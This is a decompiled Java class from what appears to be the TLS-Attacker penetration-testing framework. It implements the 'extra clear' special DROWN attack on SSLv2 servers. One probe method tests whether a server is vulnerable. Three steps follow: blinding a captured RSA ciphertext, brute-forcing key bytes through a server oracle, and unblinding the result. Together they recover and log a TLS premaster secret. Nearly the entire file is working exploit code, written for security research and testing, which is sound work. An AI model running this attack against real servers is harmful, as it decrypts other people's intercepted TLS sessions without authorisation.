/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.impl.drown;

import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.modifiablevariable.util.Modifiable;
import de.rub.nds.tlsattacker.attacks.config.SpecialDrownCommandConfig;
import de.rub.nds.tlsattacker.attacks.constants.DrownVulnerabilityType;
import de.rub.nds.tlsattacker.attacks.exception.AttackFailedException;
import de.rub.nds.tlsattacker.attacks.impl.drown.ExtraClearStep2Callable;
import de.rub.nds.tlsattacker.attacks.impl.drown.ServerVerifyChecker;
import de.rub.nds.tlsattacker.attacks.impl.drown.SievingCoprimePairGenerator;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.ExtraClearDrownOracle;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.RunningModeType;
import de.rub.nds.tlsattacker.core.constants.SSL2CipherSuite;
import de.rub.nds.tlsattacker.core.protocol.message.SSL2ClientMasterKeyMessage;
import de.rub.nds.tlsattacker.core.protocol.message.SSL2ServerVerifyMessage;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.action.ReceiveAction;
import de.rub.nds.tlsattacker.core.workflow.action.SendAction;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
import de.rub.nds.tlsattacker.util.ConsoleLogger;
import java.math.BigInteger;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * Runs the "extra clear" oracle variant of the special DROWN attack (configured through
 * {@link SpecialDrownCommandConfig}) against an SSLv2 server, using an {@link ExtraClearDrownOracle}.
 *
 * <p>The attack has three steps, mirrored by the methods {@code step1}..{@code step3}:
 * <ol>
 * <li>Multiply a captured premaster-secret ciphertext by {@code s^e mod N} until the oracle reports
 * the result as an SSLv2-conformant ENCRYPTED-KEY-DATA.</li>
 * <li>Recover the full plaintext of that converted ciphertext with the oracle.</li>
 * <li>Undo the step-1 multiplication to obtain the (padded) premaster secret.</li>
 * </ol>
 *
 * <p>Per-run state (server key, step-1 multipliers, index of the converted secret) lives in mutable
 * fields, so a single instance should not run several attacks concurrently.
 */
class ExtraClearAttack {
    private final Config tlsConfig;
    private final ExtraClearDrownOracle oracle;
    // Passed to SievingCoprimePairGenerator; presumably bounds how many candidate pairs are tried in
    // step 1 - TODO confirm against the generator.
    private final long maxTrimmerCount = 100L;
    // Server RSA public exponent e (used as the exponent in modPow below).
    private BigInteger serverPublicKey;
    // Server RSA modulus N.
    private BigInteger serverModulus;
    // Index (into the list passed to execute) of the premaster secret that step 1 converted.
    private int pmsIndex;
    // Coprime pair (u, t) found in step 1; the step-1 multiplier is s = u * t^-1 mod N.
    private BigInteger step1u;
    private BigInteger step1t;
    private static final Logger LOGGER = LogManager.getLogger();

    /**
     * Creates an attack bound to the given configuration.
     *
     * @param tlsConfig configuration used for every connection and for the oracle
     */
    public ExtraClearAttack(Config tlsConfig) {
        this.tlsConfig = tlsConfig;
        this.oracle = new ExtraClearDrownOracle(tlsConfig);
    }

    /**
     * Probes the server once to classify its DROWN exposure.
     *
     * <p>Runs the SSLv2 hello flow, then sends a CLIENT-MASTER-KEY whose CLEAR-KEY-DATA is explicitly
     * set to {@code clearKeyBytes + secretKeyBytes - 1} zero bytes, and expects a SERVER-VERIFY.
     *
     * @return {@link DrownVulnerabilityType#NONE} if no SSLv2 SERVER-HELLO was received;
     *     {@link DrownVulnerabilityType#SPECIAL} if a SERVER-VERIFY was received and
     *     {@link ServerVerifyChecker} accepts it; {@link DrownVulnerabilityType#SSL2} otherwise
     */
    public DrownVulnerabilityType checkForExtraClearOracle() {
        SSL2CipherSuite cipherSuite = this.tlsConfig.getDefaultSSL2CipherSuite();
        // One byte less than the whole key is sent in the clear. NOTE(review): presumably this probes
        // whether the server accepts an oversized clear portion (the "extra clear" bug) - confirm.
        int clearKeyLength = cipherSuite.getClearKeyByteNumber() + cipherSuite.getSecretKeyByteNumber() - 1;
        byte[] clearKey = new byte[clearKeyLength];
        ModifiableByteArray clearKeyData = Modifiable.explicit(clearKey);
        SSL2ClientMasterKeyMessage clientMasterKeyMessage = new SSL2ClientMasterKeyMessage();
        clientMasterKeyMessage.setClearKeyData(clearKeyData);

        WorkflowTrace trace = new WorkflowConfigurationFactory(this.tlsConfig)
                .createWorkflowTrace(WorkflowTraceType.SSL2_HELLO, RunningModeType.CLIENT);
        trace.addTlsAction(new SendAction(clientMasterKeyMessage));
        trace.addTlsAction(new ReceiveAction(new SSL2ServerVerifyMessage()));
        State state = new State(this.tlsConfig, trace);
        WorkflowExecutor workflowExecutor =
                WorkflowExecutorFactory.createWorkflowExecutor(this.tlsConfig.getWorkflowExecutorType(), state);
        workflowExecutor.executeWorkflow();

        if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.SSL2_SERVER_HELLO, trace)) {
            return DrownVulnerabilityType.NONE;
        }
        SSL2ServerVerifyMessage serverVerifyMessage = (SSL2ServerVerifyMessage) WorkflowTraceUtil
                .getFirstReceivedMessage(HandshakeMessageType.SSL2_SERVER_VERIFY, trace);
        if (serverVerifyMessage != null && ServerVerifyChecker.check(serverVerifyMessage, state.getTlsContext(), true)) {
            return DrownVulnerabilityType.SPECIAL;
        }
        return DrownVulnerabilityType.SSL2;
    }

    /**
     * Runs the full three-step attack and logs the recovered (padded) premaster secret.
     *
     * @param premasterSecrets captured premaster-secret ciphertexts; the first one step 1 can convert is
     *     attacked
     * @param config attack configuration (not read by this method)
     * @throws AttackFailedException if the server key cannot be obtained, no secret can be converted,
     *     or step 2 cannot recover the plaintext
     */
    public void execute(List<byte[]> premasterSecrets, SpecialDrownCommandConfig config) {
        this.initRsaParams();
        byte[] c1 = null;
        this.pmsIndex = 0;
        for (byte[] secret : premasterSecrets) {
            byte[] step1Result = this.step1(secret);
            if (step1Result != null) {
                c1 = step1Result;
                break;
            }
            ++this.pmsIndex;
        }
        if (c1 == null) {
            throw new AttackFailedException("Could not convert any Premaster secret to an SSLv2-conformant ciphertext");
        }
        ConsoleLogger.CONSOLE.info("Step 1 completed, converted Premaster secret #" + this.pmsIndex + " to ENCRYPTED-KEY-DATA");
        byte[] m1 = this.step2(c1);
        if (m1 == null) {
            throw new AttackFailedException("Could not determine plaintext for converted ciphertext");
        }
        ConsoleLogger.CONSOLE.info("Step 2 completed, determined plaintext for converted ciphertext");
        byte[] m0 = this.step3(m1);
        ConsoleLogger.CONSOLE.info("Step 3 completed, converted SECRET-KEY-DATA back to Premaster secret");
        ConsoleLogger.CONSOLE.info("(Padded) plaintext Premaster secret #" + this.pmsIndex + " is:"
                + ArrayConverter.bytesToHexString(m0, true, true));
    }

    /**
     * Runs the SSLv2 hello flow and stores the server's RSA public exponent and modulus.
     *
     * @throws AttackFailedException if either value is missing from the resulting TLS context
     */
    private void initRsaParams() {
        WorkflowTrace trace = new WorkflowConfigurationFactory(this.tlsConfig)
                .createWorkflowTrace(WorkflowTraceType.SSL2_HELLO, RunningModeType.CLIENT);
        State state = new State(this.tlsConfig, trace);
        WorkflowExecutor workflowExecutor =
                WorkflowExecutorFactory.createWorkflowExecutor(this.tlsConfig.getWorkflowExecutorType(), state);
        workflowExecutor.executeWorkflow();
        this.serverPublicKey = state.getTlsContext().getServerRSAPublicKey();
        if (this.serverPublicKey == null) {
            throw new AttackFailedException("Could not get server public key");
        }
        this.serverModulus = state.getTlsContext().getServerRsaModulus();
        if (this.serverModulus == null) {
            throw new AttackFailedException("Could not get server modulus");
        }
    }

    /**
     * Step 1: turns a captured ciphertext c0 into c1 = c0 * s^e mod N, with s = u * t^-1 for a coprime
     * pair (u, t), such that the oracle reports c1 as PKCS-conformant.
     *
     * <p>On success the pair is stored in {@link #step1u} and {@link #step1t} for steps 2 and 3.
     *
     * @param premasterSecret big-endian ciphertext bytes, read as an unsigned integer
     * @return the converted ciphertext bytes, or {@code null} if the pair generator is exhausted
     */
    private byte[] step1(byte[] premasterSecret) {
        // Read as unsigned: a ciphertext whose top bit is set must not become a negative BigInteger.
        // The rest of this class forces the same non-negative reading via ensurePositive.
        BigInteger c0 = new BigInteger(1, premasterSecret);
        BigInteger e = this.serverPublicKey;
        BigInteger N = this.serverModulus;
        SievingCoprimePairGenerator pairGenerator = new SievingCoprimePairGenerator(this.maxTrimmerCount);
        while (pairGenerator.hasNext()) {
            BigInteger[] pair = (BigInteger[]) pairGenerator.next();
            BigInteger u = pair[0];
            BigInteger t = pair[1];
            BigInteger s = u.multiply(t.modInverse(N));
            BigInteger c1 = c0.multiply(s.modPow(e, N)).mod(N);
            byte[] ciphertext = c1.toByteArray();
            if (this.oracle.checkPKCSConformity(ciphertext)) {
                this.step1u = u;
                this.step1t = t;
                return ciphertext;
            }
        }
        return null;
    }

    /**
     * Step 2: recovers the plaintext m1 of the converted ciphertext c1 chunk by chunk.
     *
     * <p>Each round multiplies the plaintext by R^-1 mod N, where R = 2^(8 * secretKeyBytes), and the
     * ciphertext by R^(-e). It then searches in parallel for a multiplier s accepted by the oracle
     * workers and recovers further trailing bytes of s * m through the oracle. The worker thread pool
     * is always shut down before this method returns or throws.
     *
     * @param c1 ciphertext produced by step 1
     * @return plaintext bytes of c1, or {@code null} if no multiplier could be found (including when
     *     the calling thread is interrupted; the interrupt flag is then restored)
     */
    private byte[] step2(byte[] c1) {
        SSL2CipherSuite cipherSuite = this.tlsConfig.getDefaultSSL2CipherSuite();
        BigInteger e = this.serverPublicKey;
        BigInteger N = this.serverModulus;
        int l_m = this.serverModulus.bitLength() / 8;
        BigInteger B = BigInteger.valueOf(2L).modPow(BigInteger.valueOf(8 * (l_m - 2)), N);
        int l_k = cipherSuite.getSecretKeyByteNumber();
        BigInteger R = BigInteger.valueOf(2L).modPow(BigInteger.valueOf(8 * l_k), N);
        BigInteger RInverse = R.modInverse(N);
        // Loop-invariant: the ciphertext-side counterpart of multiplying the plaintext by R^-1.
        BigInteger RInverseToE = RInverse.modPow(e, N);

        byte[] ciphertext = c1;
        // Initial known plaintext: 2 * B (the first two plaintext bytes are treated as known).
        BigInteger knownPlaintext = BigInteger.valueOf(2L).multiply(B);
        int knownLength = 2;
        int shiftCount = 0;
        if (this.step1u.compareTo(this.step1t) > 0) {
            knownPlaintext = knownPlaintext.multiply(this.step1u).divide(this.step1t).mod(N);
        }
        byte[] newPlaintext = this.recoverPlaintext(ciphertext);
        knownPlaintext = ExtraClearAttack.updateKnownPlaintext(knownPlaintext, newPlaintext);
        knownLength += newPlaintext.length;

        int threadNumber = Runtime.getRuntime().availableProcessors();
        LOGGER.info("Using " + threadNumber + " threads for step 2");
        ExecutorService executor = Executors.newFixedThreadPool(threadNumber);
        BigInteger sCandidateStep = BigInteger.valueOf(threadNumber * 2);
        try {
            while (knownLength < l_m) {
                knownPlaintext = knownPlaintext.multiply(RInverse).mod(N);
                BigInteger shiftedCiphertext = new BigInteger(ciphertext).multiply(RInverseToE).mod(N);
                ciphertext = ExtraClearAttack.ensurePositive(shiftedCiphertext.toByteArray());
                ++shiftCount;

                BigInteger s = this.findMultiplier(executor, threadNumber, ciphertext, l_m, e, N, sCandidateStep,
                        knownPlaintext);
                if (s == null) {
                    LOGGER.error("Could not find multiplicator during iterative recovery");
                    return null;
                }

                byte[] multipliedCiphertext = ArrayConverter.bigIntegerToByteArray(
                        s.modPow(e, N).multiply(new BigInteger(ciphertext)).mod(N), l_m, true);
                byte[] recoveredBytes = this.recoverPlaintext(multipliedCiphertext);
                // The oracle only reveals trailing bytes of s * m, so solve for m modulo 2^(8 * |recoveredBytes|).
                BigInteger byteModuloExponent = BigInteger.valueOf(recoveredBytes.length).multiply(BigInteger.valueOf(8L));
                BigInteger byteModulo = BigInteger.valueOf(2L).modPow(byteModuloExponent, N);
                // How many times N is subtracted when reducing knownPlaintext * s mod N.
                BigInteger numOfSubstractions = knownPlaintext.multiply(s).divide(N);
                // s must be invertible modulo a power of two, i.e. odd.
                BigInteger sInverse = s.modInverse(byteModulo);
                BigInteger b = new BigInteger(ExtraClearAttack.ensurePositive(recoveredBytes))
                        .add(numOfSubstractions.multiply(N).mod(byteModulo));
                BigInteger computedPlainLastBytes = b.multiply(sInverse).mod(byteModulo);
                newPlaintext = ArrayConverter.bigIntegerToByteArray(computedPlainLastBytes, recoveredBytes.length, true);
                knownPlaintext = ExtraClearAttack.updateKnownPlaintext(knownPlaintext, newPlaintext);
                knownLength += l_k;
                LOGGER.info("Step 2: Recovered " + knownLength + " of " + l_m + " bytes");
            }
        } finally {
            // Previously skipped on the early return and on exceptions, leaking non-daemon workers.
            executor.shutdownNow();
        }

        // Undo the per-round R^-1 multiplications.
        BigInteger finalPlaintext = knownPlaintext;
        for (int i = 0; i < shiftCount; ++i) {
            finalPlaintext = finalPlaintext.multiply(R).mod(N);
        }
        return finalPlaintext.toByteArray();
    }

    /**
     * Submits one {@link ExtraClearStep2Callable} per thread and returns the first non-null multiplier.
     *
     * <p>Worker {@code i} gets start value {@code 1 + 2i} and the common step {@code sCandidateStep}.
     * Presumably each worker walks odd candidates start, start + step, ... - confirm in the callable.
     * All futures are cancelled before returning, on every path.
     *
     * @return the first non-null result, or {@code null} if every worker returned {@code null} or the
     *     calling thread was interrupted (the interrupt flag is then restored)
     * @throws RuntimeException wrapping any exception thrown by a worker
     */
    private BigInteger findMultiplier(ExecutorService executor, int threadNumber, byte[] ciphertext, int l_m,
            BigInteger e, BigInteger N, BigInteger sCandidateStep, BigInteger knownPlaintext) {
        ExecutorCompletionService<BigInteger> completionService = new ExecutorCompletionService<BigInteger>(executor);
        List<Future<BigInteger>> futures = new ArrayList<Future<BigInteger>>(threadNumber);
        try {
            for (int i = 0; i < threadNumber; ++i) {
                BigInteger sCandidateStart = BigInteger.valueOf(1 + i * 2);
                ExtraClearStep2Callable callable = new ExtraClearStep2Callable(this.oracle, ciphertext, l_m, e, N,
                        sCandidateStart, sCandidateStep, knownPlaintext);
                futures.add(completionService.submit(callable));
            }
            for (int i = 0; i < threadNumber; ++i) {
                BigInteger s;
                try {
                    s = completionService.take().get();
                } catch (InterruptedException interruptedException) {
                    // Preserve the interrupt for callers and stop waiting instead of swallowing it.
                    Thread.currentThread().interrupt();
                    LOGGER.warn("Interrupted while waiting for step 2 workers", interruptedException);
                    return null;
                } catch (ExecutionException executionException) {
                    throw new RuntimeException(executionException);
                }
                if (s != null) {
                    return s;
                }
            }
            return null;
        } finally {
            for (Future<BigInteger> future : futures) {
                future.cancel(true);
            }
        }
    }

    /**
     * Step 3: removes the step-1 multiplier s = u * t^-1, returning m0 = m1 * s^-1 mod N.
     *
     * @param m1 plaintext recovered by step 2
     * @return m0 as big-endian bytes with a leading 0x00 byte prepended by {@link #ensurePositive}
     */
    private byte[] step3(byte[] m1) {
        BigInteger N = this.serverModulus;
        BigInteger step1s = this.step1u.multiply(this.step1t.modInverse(N));
        BigInteger sInverse = step1s.modInverse(N);
        BigInteger m0 = new BigInteger(ExtraClearAttack.ensurePositive(m1)).multiply(sInverse).mod(N);
        return ExtraClearAttack.ensurePositive(m0.toByteArray());
    }

    /**
     * Brute-forces the SECRET-KEY bytes behind {@code encryptedKeyData} one byte at a time via the
     * oracle, each call given the bytes found so far.
     *
     * @return a 0x00 byte followed by the recovered bytes (length secretKeyBytes + 1). NOTE(review): the
     *     leading zero presumably stands for the PKCS#1 separator before the key data - confirm.
     */
    private byte[] recoverPlaintext(byte[] encryptedKeyData) {
        SSL2CipherSuite cipherSuite = this.tlsConfig.getDefaultSSL2CipherSuite();
        byte[] plaintext = new byte[0];
        for (int i = 0; i < cipherSuite.getSecretKeyByteNumber(); ++i) {
            byte newByte = this.oracle.bruteForceKeyByte(encryptedKeyData, plaintext);
            plaintext = Arrays.copyOf(plaintext, plaintext.length + 1);
            plaintext[plaintext.length - 1] = newByte;
        }
        byte[] delimitedPlaintext = new byte[plaintext.length + 1];
        System.arraycopy(plaintext, 0, delimitedPlaintext, 1, plaintext.length);
        return delimitedPlaintext;
    }

    /**
     * Overwrites the trailing {@code newBytes.length} bytes of {@code oldPlaintext}'s big-endian encoding
     * (with a 0x00 byte prepended) by {@code newBytes}.
     *
     * @throws IndexOutOfBoundsException if {@code newBytes} is longer than that encoding
     */
    private static BigInteger updateKnownPlaintext(BigInteger oldPlaintext, byte[] newBytes) {
        byte[] plainBytes = ExtraClearAttack.ensurePositive(oldPlaintext.toByteArray());
        System.arraycopy(newBytes, 0, plainBytes, plainBytes.length - newBytes.length, newBytes.length);
        return new BigInteger(plainBytes);
    }

    /**
     * Returns a copy of {@code data} with one 0x00 byte prepended, so that {@code new BigInteger(result)}
     * reads it as a non-negative number. The byte is always added, even when not strictly needed.
     */
    protected static byte[] ensurePositive(byte[] data) {
        byte[] positiveData = new byte[data.length + 1];
        System.arraycopy(data, 0, positiveData, 1, data.length);
        return positiveData;
    }
}

